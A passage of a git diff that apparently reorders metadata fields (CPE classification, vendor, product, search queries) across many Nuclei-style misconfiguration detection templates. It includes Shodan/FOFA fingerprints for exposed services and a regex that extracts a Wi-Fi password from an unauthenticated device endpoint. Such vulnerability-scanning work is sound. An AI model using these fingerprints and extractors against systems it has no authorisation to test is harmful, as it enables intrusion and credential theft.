4b0a00483046022100fbc099737ef182029191e896b9806e610a162693a38bcbf4fabd84a3a064ce64022100cb27dd4e8aa539c21facd415d9a3d360e356988d5e4a4f33d57178e4d1602959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/casdoor-users-password.yaml b/http/misconfiguration/casdoor-users-password.yaml index 53204ae2a5..ac88a37790 100644 --- a/http/misconfiguration/casdoor-users-password.yaml +++ b/http/misconfiguration/casdoor-users-password.yaml @@ -8,16 +8,16 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1 - https://github.com/qingchenhh/qc_poc/blob/main/Goby/Casbin_get_users.go + classification: + cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="Casdoor" - product: casdoor vendor: casbin + product: casdoor + fofa-query: title="Casdoor" tags: casdoor,exposure,misconfig,disclosure - classification: - cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022057b135d11bf810e830e05881ffc3254f26c1436f37bcd9d9b4542bcde8755427022010d1ddee07bed42e9d2a7428aaeff2b6a8df455ea5f97e6b267b19cbc8889b20:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022057b135d11bf810e830e05881ffc3254f26c1436f37bcd9d9b4542bcde8755427022010d1ddee07bed42e9d2a7428aaeff2b6a8df455ea5f97e6b267b19cbc8889b20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/chatgpt-web-unauth.yaml b/http/misconfiguration/chatgpt-web-unauth.yaml index 2c2e6eb6b5..747387ca3e 100644 --- a/http/misconfiguration/chatgpt-web-unauth.yaml +++ b/http/misconfiguration/chatgpt-web-unauth.yaml @@ -5,16 +5,16 @@ info: author: SleepingBag945 severity: high description: ChatGPT Web is exposed. + classification: + cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="Chatgpt-web" - product: chatgpt_web vendor: chanzhaoyu + product: chatgpt_web + fofa-query: app="Chatgpt-web" tags: chatgpt,unauth,misconfig - classification: - cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:* http: - raw: - | @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009335765c3a461281c6686e5525ef4df6ad033b509221998c003f467783efccbe022002fed2ad57b70a38346af4229f8309b5d16a21de09c245e1af3638f9d0086475:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221009335765c3a461281c6686e5525ef4df6ad033b509221998c003f467783efccbe022002fed2ad57b70a38346af4229f8309b5d16a21de09c245e1af3638f9d0086475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/clickhouse-unauth-api.yaml b/http/misconfiguration/clickhouse-unauth-api.yaml index d787252526..9e94edf707 100644 --- a/http/misconfiguration/clickhouse-unauth-api.yaml +++ b/http/misconfiguration/clickhouse-unauth-api.yaml @@ -8,17 +8,17 @@ info: reference: - https://github.com/luck-ying/Library-POC/blob/master/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93/ClickHouse%E6%95%B0%E6%8D%AE%E5%BA%93%208123%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.py - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/redteam/vulnerability/unauthorized/ClickHouse%208123%E7%AB%AF%E5%8F%A3.md?plain=1 + classification: + cpe: cpe:2.3:a:clickhouse:clickhouse:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: clickhouse + product: clickhouse shodan-query: "X-ClickHouse-Summary" fofa-query: "X-ClickHouse-Summary" - product: clickhouse - vendor: clickhouse tags: misconfig,clickhouse,unauth,disclosure - classification: - cpe: cpe:2.3:a:clickhouse:clickhouse:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0b5c453b540196a3297c18713c3638b6327d815009a24c1b054e31cd98ab0ab02203243446e5cb8801e67889a19c0c6dd4298a25228b1181c835f909574b5096336:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100a0b5c453b540196a3297c18713c3638b6327d815009a24c1b054e31cd98ab0ab02203243446e5cb8801e67889a19c0c6dd4298a25228b1181c835f909574b5096336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/codeigniter-errorpage.yaml b/http/misconfiguration/codeigniter-errorpage.yaml index 4694ed2050..61deab0539 100644 --- a/http/misconfiguration/codeigniter-errorpage.yaml +++ b/http/misconfiguration/codeigniter-errorpage.yaml @@ -5,17 +5,17 @@ info: author: j4vaovo severity: low description: CodeIgniter error debug are enabled. + classification: + cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: codeigniter + product: codeigniter shodan-query: title:"Error" html:"CodeIgniter" fofa-query: title="ErrorException" - product: codeigniter - vendor: codeigniter tags: codeigniter,misconfig,error - classification: - cpe: cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +42,5 @@ http: - 200 - 500 condition: or -# digest: 4a0a00473045022100e319bcb75ac516a3b64842cee0c3a3a33f986ea077cfe62f49c0696041a6108202203874da1c083c996fb5fce8ab458fee421bf5b1d2c9dbe7646e06cd167c873c99:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e319bcb75ac516a3b64842cee0c3a3a33f986ea077cfe62f49c0696041a6108202203874da1c083c996fb5fce8ab458fee421bf5b1d2c9dbe7646e06cd167c873c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/codemeter-webadmin.yaml b/http/misconfiguration/codemeter-webadmin.yaml index ef4a65b9e2..89b632bebc 100644 --- a/http/misconfiguration/codemeter-webadmin.yaml +++ b/http/misconfiguration/codemeter-webadmin.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: low description: CodeMeter Webadmin Dashboard is exposed. + classification: + cpe: cpe:2.3:a:wibu:codemeter:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"CodeMeter" - product: codemeter vendor: wibu + product: codemeter + shodan-query: html:"CodeMeter" tags: misconfig,exposure,codemeter - classification: - cpe: cpe:2.3:a:wibu:codemeter:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220207a4d8416d0eaaaae895ad3ebe6cb609571e0eca805a2752fa911c8b247d3f50220307c9c8a42f0463b53b32bdc4bceb92d7bec6e4285a0e2876d686440fa42009b:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220207a4d8416d0eaaaae895ad3ebe6cb609571e0eca805a2752fa911c8b247d3f50220307c9c8a42f0463b53b32bdc4bceb92d7bec6e4285a0e2876d686440fa42009b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/confluence/confluence-oauth-admin.yaml b/http/misconfiguration/confluence/confluence-oauth-admin.yaml index 8b922823aa..fbe8e4e358 100644 --- a/http/misconfiguration/confluence/confluence-oauth-admin.yaml +++ b/http/misconfiguration/confluence/confluence-oauth-admin.yaml @@ -4,16 +4,16 @@ info: name: Confluence OAuth Administration Endpoint author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: http.component:"Atlassian Confluence" - product: confluence_server vendor: atlassian + product: confluence_server + shodan-query: http.component:"Atlassian Confluence" tags: misconfig,jira,confluence,atlassian - classification: - cpe: cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,4 @@ http: status: - 200 -# digest: 490a0046304402205f5d2f6d95a707362ce5fb3826602901729a8b3859f7d0749aa0492016d3b19e022043b856314d022b592b5ddcbb70711c732af0a74200285cad7bc71ece864493fc:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205f5d2f6d95a707362ce5fb3826602901729a8b3859f7d0749aa0492016d3b19e022043b856314d022b592b5ddcbb70711c732af0a74200285cad7bc71ece864493fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/debug/ampache-debug.yaml b/http/misconfiguration/debug/ampache-debug.yaml index 3ada6c1880..5ce91a1282 100644 --- a/http/misconfiguration/debug/ampache-debug.yaml +++ b/http/misconfiguration/debug/ampache-debug.yaml @@ -4,16 +4,16 @@ info: name: Ampache Debug Page author: ritikchaddha severity: info + classification: + cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: http.title:"Ampache -- Debug Page" - product: ampache vendor: ampache + product: ampache + shodan-query: http.title:"Ampache -- Debug Page" tags: misconfig,ampache,debug - classification: - cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 490a0046304402204fc96c27b19ab1615ece4b327244a62166cee8f2f8aabd0a48dbefab8865984502201572545154f63f6bf6f67cbbdbc65d7a0e7b286b67fdcf4424c5e5c446cb48ff:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204fc96c27b19ab1615ece4b327244a62166cee8f2f8aabd0a48dbefab8865984502201572545154f63f6bf6f67cbbdbc65d7a0e7b286b67fdcf4424c5e5c446cb48ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/debug/bottle-debug.yaml b/http/misconfiguration/debug/bottle-debug.yaml index d9d7eec4ba..a7ee7da17d 100644 --- a/http/misconfiguration/debug/bottle-debug.yaml +++ b/http/misconfiguration/debug/bottle-debug.yaml @@ -6,16 +6,16 @@ info: severity: info reference: - https://bottlepy.org/docs/dev/tutorial.html#debug-mode + classification: + cpe: cpe:2.3:a:bottlepy:bottle:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Sorry, the requested URL" - product: bottle vendor: bottlepy + product: bottle + shodan-query: html:"Sorry, the requested URL" tags: bottle,exposure,debug,misconfig - classification: - cpe: cpe:2.3:a:bottlepy:bottle:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: - "'{{BaseURL}}/'" condition: or -# digest: 4a0a00473045022012b6c62f22fdb55acfcc6273506038637071f337b450e4cc0f8950870e324624022100f75350502fd6d4b2c633ea8670b249e594b40748f5a1ca5df478d71059a6a64d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022012b6c62f22fdb55acfcc6273506038637071f337b450e4cc0f8950870e324624022100f75350502fd6d4b2c633ea8670b249e594b40748f5a1ca5df478d71059a6a64d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/debug/flask-werkzeug-debug.yaml b/http/misconfiguration/debug/flask-werkzeug-debug.yaml index b827866657..b3c34526a1 100644 --- a/http/misconfiguration/debug/flask-werkzeug-debug.yaml +++ b/http/misconfiguration/debug/flask-werkzeug-debug.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: low description: Flask Werkzeug Debugger is exposed. + classification: + cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Werkzeug powered traceback interpreter" - product: werkzeug vendor: palletsprojects + product: werkzeug + shodan-query: html:"Werkzeug powered traceback interpreter" tags: werkzeug,exposure,debug,misconfig - classification: - cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100c518e1fe0851c09171f99cd760d1a3d502d865e36aa5cc054e0d7d5a0ee24e860221008894b61367eee9ece8b8e3823f65efa8e47d1d41323d0acaa7c397ce45632a54:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c518e1fe0851c09171f99cd760d1a3d502d865e36aa5cc054e0d7d5a0ee24e860221008894b61367eee9ece8b8e3823f65efa8e47d1d41323d0acaa7c397ce45632a54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/debug/github-debug.yaml b/http/misconfiguration/debug/github-debug.yaml index 796ff1caeb..70578365fd 100644 --- a/http/misconfiguration/debug/github-debug.yaml +++ b/http/misconfiguration/debug/github-debug.yaml @@ -4,16 +4,16 @@ info: name: GitHub Debug Page author: ritikchaddha severity: info + classification: + cpe: cpe:2.3:a:github:github:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"GitHub Debug" - product: github vendor: github + product: github + shodan-query: http.title:"GitHub Debug" tags: misconfig,github,debug - classification: - cpe: cpe:2.3:a:github:github:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,4 @@ http: status: - 200 -# digest: 4a0a004730450220368f65ddbf626763d8326cc25f3668115141d7fd2180672ca147a14dec0236e502210080a54b7634fad72382160016ff20b85118873418acca127af37dd58707234329:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220368f65ddbf626763d8326cc25f3668115141d7fd2180672ca147a14dec0236e502210080a54b7634fad72382160016ff20b85118873418acca127af37dd58707234329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/dlink-unauth-cgi-script.yaml b/http/misconfiguration/dlink-unauth-cgi-script.yaml index 69e4249ed9..9c11e144ed 100644 --- a/http/misconfiguration/dlink-unauth-cgi-script.yaml +++ b/http/misconfiguration/dlink-unauth-cgi-script.yaml @@ -8,16 +8,16 @@ info: A vulnerability has been identified in the D-Link DNS series network storage devices, allowing for the exposure of sensitive device information to unauthorized actors. This vulnerability is due to an unauthenticated access flaw in the info.cgi script, which can be exploited via a simple HTTP GET request, affecting over 920,000 devices on the Internet. reference: - https://github.com/netsecfish/info_cgi + classification: + cpe: cpe:2.3:h:dlink:dns-345:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: "app=\"D_Link-DNS\"" - product: dns-345 vendor: dlink + product: dns-345 + fofa-query: "app=\"D_Link-DNS\"" tags: unauth,dlink,misconfig - classification: - cpe: cpe:2.3:h:dlink:dns-345:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100faef3e2642d3cd1b6e8e24c56eb728238309501a9db8898c308041635af4bbb6022100ed2440b3bd0c13869879595085a08be11ff936d4e974efba5ccd878ed7bf8de8:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100faef3e2642d3cd1b6e8e24c56eb728238309501a9db8898c308041635af4bbb6022100ed2440b3bd0c13869879595085a08be11ff936d4e974efba5ccd878ed7bf8de8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/docmosis-tornado-server.yaml b/http/misconfiguration/docmosis-tornado-server.yaml index 780249dc4a..897c67d518 100644 --- a/http/misconfiguration/docmosis-tornado-server.yaml +++ b/http/misconfiguration/docmosis-tornado-server.yaml @@ -5,16 +5,16 @@ info: author: tess severity: low description: Docmosis Tornado Server is exposed. + classification: + cpe: cpe:2.3:a:docmosis:tornado:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Docmosis Tornado" - product: tornado vendor: docmosis + product: tornado + shodan-query: title:"Docmosis Tornado" tags: misconfig,tornado,exposure - classification: - cpe: cpe:2.3:a:docmosis:tornado:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210085196cf99e1013fc3639e0a86644db2cd83ace3fb4d3adf2f7a956b42b38c354022100bc9c821d87d3ccf71f20973763c70a5f0daa357f6a53e17387818f30cc2f0304:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a0048304602210085196cf99e1013fc3639e0a86644db2cd83ace3fb4d3adf2f7a956b42b38c354022100bc9c821d87d3ccf71f20973763c70a5f0daa357f6a53e17387818f30cc2f0304:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml b/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml index e7d8a3d74c..b082b6f013 100644 --- a/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml +++ b/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml @@ -4,16 +4,16 @@ info: name: Drupal User Enumeration [Redirect] author: 0w4ys severity: info + classification: + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 - shodan-query: http.component:"Drupal" - product: drupal vendor: drupal + product: drupal + shodan-query: http.component:"Drupal" tags: drupal,misconfig - classification: - cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +41,4 @@ http: regex: - 'users\/\w+' -# digest: 4a0a0047304502200de89bdfcb97c4155efda7d3f5205c3f4a69ad3ba6f4fed003236be2c344fdc8022100dae0c0e6ac45c5ff55dede27fe4bddad9ba930e2566f79daa348ae68d5184bec:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200de89bdfcb97c4155efda7d3f5205c3f4a69ad3ba6f4fed003236be2c344fdc8022100dae0c0e6ac45c5ff55dede27fe4bddad9ba930e2566f79daa348ae68d5184bec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/elasticsearch.yaml b/http/misconfiguration/elasticsearch.yaml index fa2f2892ac..1a275cf109 100644 --- a/http/misconfiguration/elasticsearch.yaml +++ b/http/misconfiguration/elasticsearch.yaml @@ -5,16 +5,16 @@ info: author: Shine,c-sh0,geeknik severity: low description: Internal information is exposed in elasticsearch to external users. + classification: + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 - shodan-query: "ElasticSearch" - product: elasticsearch vendor: elasticsearch + product: elasticsearch + shodan-query: "ElasticSearch" tags: elastic,unauth,elasticsearch,misconfig - classification: - cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* http: - method: GET path: @@ -52,4 +52,5 @@ http: group: 1 regex: - '"number"\s:\s"([0-9.]+)"' -# digest: 490a0046304402207b44d14688d4487c464122b6e50ecfa3559829942a4dd3bcbe6a74ae7fa56e8d02204fea683b7c3a02f35cc6c012dc4792d3cfd602f30f84b57a8d1aaab32d4ad067:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402207b44d14688d4487c464122b6e50ecfa3559829942a4dd3bcbe6a74ae7fa56e8d02204fea683b7c3a02f35cc6c012dc4792d3cfd602f30f84b57a8d1aaab32d4ad067:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/envoy-admin-exposure.yaml b/http/misconfiguration/envoy-admin-exposure.yaml index ea0be43e2d..23e8a79321 100644 --- a/http/misconfiguration/envoy-admin-exposure.yaml +++ b/http/misconfiguration/envoy-admin-exposure.yaml @@ -7,16 +7,16 @@ info: description: Envoy Admin page exposed. reference: - https://www.envoyproxy.io/docs/envoy/latest/ + classification: + cpe: cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Envoy Admin" - product: envoy vendor: envoyproxy + product: envoy + shodan-query: title:"Envoy Admin" tags: misconfig,envoy,exposure - classification: - cpe: cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200730b4d4870c7f30e367b50699bcbd9fe09401983b47158e6e000f12f4f178fe022100ac3d37047f7413c77e9e050d233af8f0433c92f1f4b80cb590a3581ad5bb38ac:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502200730b4d4870c7f30e367b50699bcbd9fe09401983b47158e6e000f12f4f178fe022100ac3d37047f7413c77e9e050d233af8f0433c92f1f4b80cb590a3581ad5bb38ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/esphome-dashboard.yaml b/http/misconfiguration/esphome-dashboard.yaml index 2e125d431f..b94970e192 100644 --- a/http/misconfiguration/esphome-dashboard.yaml +++ b/http/misconfiguration/esphome-dashboard.yaml @@ -6,16 +6,16 @@ info: severity: medium description: | ESPHome Dashboard exposes the secrets like wifi password,api keys and internal logs, it also allows users to make changes through the dashboard. + classification: + cpe: cpe:2.3:a:esphome:esphome:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Dashboard - ESPHome" - product: esphome vendor: esphome + product: esphome + shodan-query: title:"Dashboard - ESPHome" tags: misconfig,esphome,exposure,iot - classification: - cpe: cpe:2.3:a:esphome:esphome:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,4 @@ http: status: - 200 -# digest: 4b0a004830460221008dfb02ec7c1faf58b00a8819d714025454cc3c672237f9cf902fc3d0b453b193022100cf719003994e36b6ef2b0736e2ce738b2406e374ec8c5378b6bfc4d4fe18787f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008dfb02ec7c1faf58b00a8819d714025454cc3c672237f9cf902fc3d0b453b193022100cf719003994e36b6ef2b0736e2ce738b2406e374ec8c5378b6bfc4d4fe18787f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/everything-listing.yaml b/http/misconfiguration/everything-listing.yaml index f1f1cfe49f..10c39679aa 100644 --- a/http/misconfiguration/everything-listing.yaml +++ b/http/misconfiguration/everything-listing.yaml @@ -8,16 +8,16 @@ info: Everything is a freeware desktop search utility for Windows that can rapidly find files and folders by name. reference: - https://www.voidtools.com/ + classification: + cpe: cpe:2.3:a:voidtools:everything:*:*:*:*:*:*:*:* metadata: verified: 'true' max-request: 1 - shodan-query: http.favicon.hash:-977323269 - product: everything vendor: voidtools + product: everything + shodan-query: http.favicon.hash:-977323269 tags: exposure,everything,listing,voidtools,misconfig - classification: - cpe: cpe:2.3:a:voidtools:everything:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 4a0a00473045022079110f4ab115a14607c2b614e6c87b6ec9573a1644682e3b60d707d812835118022100f7b5f3d3cf5b49015d6a2c395406891b6b7976d6a98de0d571542ada593b8e13:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022079110f4ab115a14607c2b614e6c87b6ec9573a1644682e3b60d707d812835118022100f7b5f3d3cf5b49015d6a2c395406891b6b7976d6a98de0d571542ada593b8e13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/feiyuxing-info-leak.yaml b/http/misconfiguration/feiyuxing-info-leak.yaml index defed9ac49..bdf49a2e17 100644 --- a/http/misconfiguration/feiyuxing-info-leak.yaml +++ b/http/misconfiguration/feiyuxing-info-leak.yaml @@ -10,16 +10,16 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E9%A3%9E%E9%B1%BC%E6%98%9F/%E9%A3%9E%E9%B1%BC%E6%98%9F%20%E4%BC%81%E4%B8%9A%E7%BA%A7%E6%99%BA%E8%83%BD%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leakage.json - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%A3%9E%E9%B1%BC%E6%98%9F%20%E4%BC%81%E4%B8%9A%E7%BA%A7%E6%99%BA%E8%83%BD%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:o:feiyuxing:vec40g_firmware:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 - fofa-query: title="飞鱼星企业级智能上网行为管理系统" - product: vec40g_firmware vendor: feiyuxing + product: vec40g_firmware + fofa-query: title="飞鱼星企业级智能上网行为管理系统" tags: misconfig,exposure,iot,wpa,wpa2 - classification: - cpe: cpe:2.3:o:feiyuxing:vec40g_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,4 @@ http: regex: - "\"wl_passwd_5g\":\"(.*?)\"" -# digest: 4a0a00473045022024def7c98d8c3f84bff3da5bf59a7e7cc750b32574590afd4a3d7c5e0d7b8499022100be2b6cec86528d1cbdd6ea782fb9e2bc4be2b9a123562a00dbd1583b884faf21:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022024def7c98d8c3f84bff3da5bf59a7e7cc750b32574590afd4a3d7c5e0d7b8499022100be2b6cec86528d1cbdd6ea782fb9e2bc4be2b9a123562a00dbd1583b884faf21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/freshrss-unauth.yaml b/http/misconfiguration/freshrss-unauth.yaml index 0f9e8f51d6..c3e9adb081 100644 --- a/http/misconfiguration/freshrss-unauth.yaml +++ b/http/misconfiguration/freshrss-unauth.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Freshrss Admin Dashboard has been exposed. - metadata: - max-request: 1 - verified: true - shodan-query: title:"Freshrss" - product: freshrss - vendor: freshrss - tags: freshrss,misconfig,unauth,exposed - classification: cpe: cpe:2.3:a:freshrss:freshrss:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: freshrss + product: freshrss + shodan-query: title:"Freshrss" + tags: freshrss,misconfig,unauth,exposed + http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220711bbfdcea48f25f55e1465d58bfd13ab15e3e265a3435e2e0c4eb6f05333ca502201aea2a64cb3967574dcca15eb39690a94c8a775529bc1de47ca4820df7f6f2ad:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220711bbfdcea48f25f55e1465d58bfd13ab15e3e265a3435e2e0c4eb6f05333ca502201aea2a64cb3967574dcca15eb39690a94c8a775529bc1de47ca4820df7f6f2ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/fusionauth-admin-setup.yaml b/http/misconfiguration/fusionauth-admin-setup.yaml index fa94fa0970..f496c6fddd 100644 --- a/http/misconfiguration/fusionauth-admin-setup.yaml +++ b/http/misconfiguration/fusionauth-admin-setup.yaml @@ -5,17 +5,17 @@ info: author: ritikchaddha severity: high description: FusionAuth Admin Setup is exposed. + classification: + cpe: cpe:2.3:a:fusionauth:fusionauth:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: fusionauth + product: fusionauth shodan-query: title:"FusionAuth Setup Wizard" fofa-query: title="FusionAuth Setup Wizard" - product: fusionauth - vendor: fusionauth tags: misconfig,fusionauth,admin,setup - classification: - cpe: cpe:2.3:a:fusionauth:fusionauth:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022007d4dbb8a296fe926e5f296078aecfd6e737a4478b5ce8761f2de44c8620c953022018807ad838fddfa4096e7915fccf574e67b1c1b935d5c10d07082af0640b8632:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022007d4dbb8a296fe926e5f296078aecfd6e737a4478b5ce8761f2de44c8620c953022018807ad838fddfa4096e7915fccf574e67b1c1b935d5c10d07082af0640b8632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/ganglia-cluster-dashboard.yaml b/http/misconfiguration/ganglia-cluster-dashboard.yaml index 67104edb8d..dbdedb4b73 100644 --- a/http/misconfiguration/ganglia-cluster-dashboard.yaml +++ b/http/misconfiguration/ganglia-cluster-dashboard.yaml @@ -6,16 +6,16 @@ info: severity: low description: | Ganglia Cluster dashboard was detected. + classification: + cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"ganglia_form.submit()" - product: ganglia-web vendor: ganglia + product: ganglia-web + shodan-query: html:"ganglia_form.submit()" tags: misconfig,ganglia,dashboard - classification: - cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: status: - 200 -# digest: 4b0a00483046022100d876d2fca5590cc09d31a44355985f6ff6ea31ce2d28eff4ecd44fe31dc885450221008a3efcbfeefdd8048c364dadff65adfee39c81ed5a7540a9bd5e366bcce4e453:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d876d2fca5590cc09d31a44355985f6ff6ea31ce2d28eff4ecd44fe31dc885450221008a3efcbfeefdd8048c364dadff65adfee39c81ed5a7540a9bd5e366bcce4e453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/git-web-interface.yaml 